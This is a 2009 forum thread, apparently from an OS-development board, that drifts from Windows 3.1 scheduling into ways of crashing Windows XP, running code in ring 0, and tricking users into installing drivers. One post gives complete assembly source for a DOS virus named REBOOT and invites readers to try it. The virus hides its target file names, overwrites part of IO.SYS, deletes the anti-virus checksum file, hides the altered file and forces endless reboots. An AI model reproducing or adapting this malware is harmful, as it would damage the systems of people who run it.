Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 12:03 pm
thats what i was thinking, trash data or dll's stored in memory. maybe even the kernel, i will try that tonight, see what happens and report back to you guys
Page 2 of 3
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 2:17 pm
History told that Windows for workgroups was cooperatively scheduled. There was a program that could play wave files over the PC speaker, and to do so it had to lockstep with the PIT. Which meant that other programs were denied processor time because it didn't use system calls, which would otherwise have yielded the timeslice. And that was exactly what happened - the computer froze for the duration of the wavefile. Even the mouse wouldn't move.
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 2:29 pm
Actually, 3.1 ran in 16-bit protected mode most of the time. There hasn't been a real mode Windows since 2.0-ish. Just about everyone gets these details wrong, because Windows had a complex evolution. I have tried to set it straight several times on these forums -- do a search and you'll find some interesting stuff.Love4Boobies wrote:IIRC, Windows 3.1 can also be ran in the infamous 16-bit protected mode for 80286+ CPUs, not just in real mode.
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 4:05 pm
combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 4:48 pm
GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 5:58 pm
well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that is might what you need
and then in ring 0, just "CLI" then windows is DOWN
however, i have not tried it ..
KMT dk
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that is might what you need
and then in ring 0, just "CLI" then windows is DOWN
however, i have not tried it ..
KMT dk
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 6:05 pm
kmtdk wrote:well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that is might what you need
and then in ring 0, just "CLI" then windows is DOWN
however, i have not tried it ..
KMT dk
Well yea if your running in ring 0 you can do anything lol. Device drivers run in kernel space.
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 9:52 pm
how do you run your program in windows XP ring 0?
Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 11:10 pm
or have the user say "yes" to some prompt about accounts.. or wait that's vista... assuming you are running as an administrator, fully possible.. install a driver... you can talk windows users into anything. "There is an updated driver for your monitor that will make it show cute little bunnies. just say yes to the following prompt"... Also, isn't there a way to start applications/drivers at the very core of startup? One guy charged like $800 or somethign for ramdisk software for windows. I asked him why it was so expensive(and yes, he did sell it, and well) and he said because it was loaded as one of the base drivers of windows, meaning the kernel could use it at a very early stage. Because of this however, he had to write his own NTFS code because at that early of a stage, who knows if the "real" NTFS driver is loaded yet or not...or maybe it was BS to shut me up... loldude101 wrote:GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
oh yea, and ring 0 in XP involves using a special hack with the "at" command so that you start a new process as "SYSTEM"
I haven't tried it myself though...
Re: windows 3.1 fun
Posted: Mon Jun 08, 2009 2:26 am
In your case, I suggest throwing your computer out the window to crash windows, csrss.exe included 
*ducks and runs*
*ducks and runs*
Re: windows 3.1 fun
Posted: Mon Jun 08, 2009 3:57 am
So... ReadProcessMemory and WriteProcessMemory are bug in the OS?dude101 wrote:GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
Re: windows 3.1 fun
Posted: Mon Jun 08, 2009 8:39 am
Hey Ghost, the code in your signature is wrong... 
It jumps to segment 8000h, which would be linear 80000h... but I shouldn't have to tell you that, now should I?
It jumps to segment 8000h, which would be linear 80000h... but I shouldn't have to tell you that, now should I?Re: windows 3.1 fun
Posted: Mon Jun 08, 2009 9:33 am
Well there is that.. doubt it allows you to write to SYSTEM processes though, and you have to be administrator to go from user A process to user B process... (Really I now fully appreciate how dangerous it is running as "root" in windows, as everyone does just about)Masterkiller wrote:So... ReadProcessMemory and WriteProcessMemory are bug in the OS?dude101 wrote:GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
Re: windows 3.1 fun
Posted: Mon Jun 08, 2009 11:56 am
Here try this, I wrote it back in the 1800's or so. It just keeps rebooting...
Code: Select all
; REBOOT - Virus written by Bill Hudson
P8086 ;select the processor
MODEL TINY ;always must be TINY model
DATASEG
FName1 DB 'c'-20 ; File to be INFECTED (CODED)
DB ':'-20,'\'-20,'i'-20,'o'-20
DB '.'-20,'s'-20,'y'-20,'s'-20
;FName1 DB 'c:\io.sys' ; File to be INFECTED
EOF DW 2400h
FName2 DB 'c'-20 ; MS Anti-Virus CHECKSUMS file
DB ':'-20,'\'-20,'c'-20,'h'-20
DB 'k'-20,'l'-20,'i'-20,'s'-20
DB 't'-20,'.'-20,'m'-20,'s'-20
;FName2 DB 'c:\chklist.ms' ; MS Anti-Virus CHECKSUMS file
DW 1A00h
UDATASEG
DW 100H DUP (?)
MyStack LABEL WORD
CODESEG
STARTUPCODE
MOV SP,OFFSET MyStack
CALL DoIt
MOV AH,4CH ; AL has DOS Exit Code in it (see end of DOIT)
INT 21H ; Exit to DOS
RET
DoIt PROC NEAR
PUSH AX BX CX DX
MOV BX,OFFSET FName1
MOV CX,9
Decode1:
ADD BYTE PTR [BX],20
INC BX
LOOP DeCode1
MOV BX,OFFSET FName2
MOV CX,13
Decode2:
ADD BYTE PTR [BX],20
INC BX
LOOP DeCode2
MOV AX,4301h ; Set ATTRIB
MOV CX,0 ; None
MOV DX,OFFSET FName1 ; IO.SYS
INT 21h
MOV EOF,1A00h ; Change for open file
MOV AX,3D02h ; OPEN for WRITE
INT 21h
MOV BX,AX ; Get HANDLE in BX
MOV AX,4200h ; SEEK byte
XOR CX,CX
MOV DX,0238h
INT 21h
MOV AX,4000h ; Write to file
MOV CX,OFFSET ReBoot - OFFSET EndMsg ; VIRUS length
MOV DX,OFFSET ReBoot ; VIRUS
PUSH DS ; Save data seg
PUSH CS ; Get code seg
POP DS ; In data seg
INT 21h
POP DS ; Restore data seg
MOV AX,3E00h ; Close IO.SYS
INT 21h
MOV AX,4100h ; Delete file
MOV DX,OFFSET Fname2 ; CHKLIST.MS
INT 21h
MOV EOF,2400h ; Change for Attrib
MOV AX,4301h ; Set ATTRIB
MOV CX,7 ; SYSTEM - HIDDEN - READONLY
MOV DX,OFFSET FName1
INT 21h
POP DX CX BX AX
MOV AL,1 ; DOS Exit Code
RET
DoIt ENDP
ReBoot:
MOV AX,0B800h ; Screen seg
MOV ES,AX ; Into ES
MOV BX,609 ; Location of Msg (HARD-CODED)
; ReBoot is at 568 (0238h)
MOV DI,3077 ; Screen Address
MOV AL,17h ; Attribute
MOV CX,44 ; 44 bytes
CLD ; INC DI after STOSW
ReBoot1:
MOV AH,CS:[BX] ; Get a byte from message
ADD AX,1400h ; ADD 20 to DECODE
STOSW ; Write byte to screen
INC BX ; Next byte in Msg
LOOP ReBoot1
MOV AX,40h ; Seg 40 BIOS DATA AREA
MOV ES,AX ; In ES
MOV ES:72h,1200h ; REBOOT FLAG
INT 19H ; REBOOT
EndReBoot:
Msg:
DB 'Y'-20,'o'-20,'u'-20,'r'-20,' '-20
DB 's'-20,'y'-20,'s'-20,'t'-20,'e'-20
DB 'm'-20,' '-20,'h'-20,'a'-20,'s'-20
DB ' '-20,'b'-20,'e'-20,'e'-20,'n'-20
DB ' '-20,'I'-20,'N'-20,'F'-20,'E'-20
DB 'C'-20,'T'-20,'E'-20,'D'-20,' '-20
DB 'b'-20,'y'-20,' '-20,'R'-20,'E'-20
DB 'B'-20,'O'-20,'O'-20,'T'-20,'!'-20
DB '!'-20,'!'-20,' '-20,' '-20
EndMsg:
; MSG: DB 'Your system has been INFECTED by REBOOT!!! '
END
Re: windows 3.1 fun
Posted: Mon Jun 08, 2009 3:57 pm
troy: so? i just put random stuff down for a joke, some times my random stuff are wrong, doesnt matter, its funny right?